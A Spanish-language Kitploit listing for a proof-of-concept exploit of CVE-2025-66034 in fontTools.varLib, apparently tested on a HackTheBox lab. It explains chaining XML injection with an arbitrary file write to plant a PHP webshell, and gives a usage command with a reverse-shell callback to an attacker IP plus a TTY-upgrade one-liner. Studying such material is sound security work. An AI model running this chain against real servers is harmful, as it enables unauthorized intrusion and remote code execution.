Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-66034 — CVE-2025-66034 - fontTools varLib Escritura Arbitraria de Archivos → RCE PoC exploit para una vulnerabilidad de Escritura Arbitraria de Archivos + Inyección XML en fontTools.varLib. | Kitploit
Herramientas/GitHubGitHub/4nuxd/cve-2025-66034
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebCTFPruebas de PenetraciónDesarrollo de Payloads
GitHub4nuxd/cve-2025-66034

CVE-2025-66034

CVE-2025-66034 - fontTools varLib Escritura Arbitraria de Archivos → RCE PoC exploit para una vulnerabilidad de Escritura Arbitraria de Archivos + Inyección XML en fontTools.varLib.

Ver Repositorio
hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-66034 — fontTools varLib Escritura Arbitraria de Archivos → RCE

Exploit PoC para una vulnerabilidad de Escritura Arbitraria de Archivos + Inyección XML en fontTools.varLib Probado en HackTheBox — VarIaType


Vulnerabilidad

fontTools.varLib procesa archivos XML .designspace para construir fuentes variables. Dos debilidades se combinan para lograr RCE sin autenticación:

#PrimitivaDetalle
1Inyección XML mediante división CDATAEl contenido controlado por el atacante dentro de <labelname> se escribe textualmente en el cuerpo del archivo de fuente de salida, permitiendo la inyección de datos arbitrarios
2Escritura Arbitraria de Archivos mediante omisión de os.path.join()El atributo filename de <variable-font> acepta una ruta absoluta. Cuando se pasa a os.path.join(), descarta el directorio de salida previsto y escribe en cualquier ruta del sistema de archivos especificada por el atacante

Encadenar ambas primitivas permite escribir una webshell PHP en una ruta accesible web, logrando una Ejecución Remota de Código sin autenticación.


Uso

root@kitploit:~
python3 font_varlib.py \
  --ip <attacker-ip> \
  --port <port> \
  --upload http://target.htb/tools/variable-font-generator/process \
  --webroot /var/www/portal.target.htb/public/files \
  --shell http://portal.target.htb/files

Opciones

Dependencias

root@kitploit:~
pip install requests fonttools

Cómo Funciona

  1. Fuentes maestras — Se generan dos archivos .ttf mínimos (source-light.ttf, source-regular.ttf) usando fontTools.FontBuilder como maestros requeridos para el designspace
  2. .designspace malicioso — Se construye un archivo XML manipulado con:
    • webshell PHP inyectada mediante una división CDATA dentro de <labelname>
    • Ruta de escritura absoluta establecida como filename de <variable-font>, omitiendo output_dir mediante os.path.join()
  3. Subida — El .designspace + las fuentes maestras se envían mediante POST al endpoint de procesamiento
  4. Disparador — Se solicita el archivo .php plantado, ejecutando el payload de reverse shell

Divulgación

Campo
CVECVE-2025-66034
Componente afectadofontTools.varLib
ImpactoEscritura Arbitraria de Archivos sin Autenticación → Ejecución Remota de Código
ContextoAplicación web que expone un endpoint de procesamiento de fuentes

Legal

Esta herramienta está destinada solo para pruebas de penetración autorizadas y uso en CTF. No la ejecute contra sistemas que no posea o para los que no tenga permiso explícito por escrito para realizar pruebas.


por 4nuxd

Descargar herramienta
FlagDescripción
--ipIP del atacante para el callback de la reverse shell
--portPuerto del listener
--uploadURL completa del endpoint de procesamiento de fuentes (POST)
--webrootRuta absoluta del lado del servidor que se asigna a un directorio accesible web
--shellURL base bajo la cual la webshell será accesible
--no-listenOmitir auto-listener — imprimir comandos manuales en su lugar
--pwncatUsar pwncat-cs en lugar de nc (preferido si está disponible)
  • Mejora de TTY — Al conectar, el script genera automáticamente una PTY mediante python3 -c 'import pty; pty.spawn("/bin/bash")' y establece TERM + stty para una shell completamente interactiva